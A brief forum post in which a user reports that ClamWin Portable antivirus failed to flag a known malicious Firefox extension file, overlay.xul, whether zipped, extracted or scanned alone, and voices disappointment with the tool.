Post by Tom T. »

FWIW, ClamWin Portable AV apparently cannot scan inside .zip files. When the goored folder was extracted and scanned, it still was not flagged as malware. When the known malicious file overlay.xul was scanned individually, ClamWin said, "No infection found." :cry: .... so much for ClamWin, IMHO.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5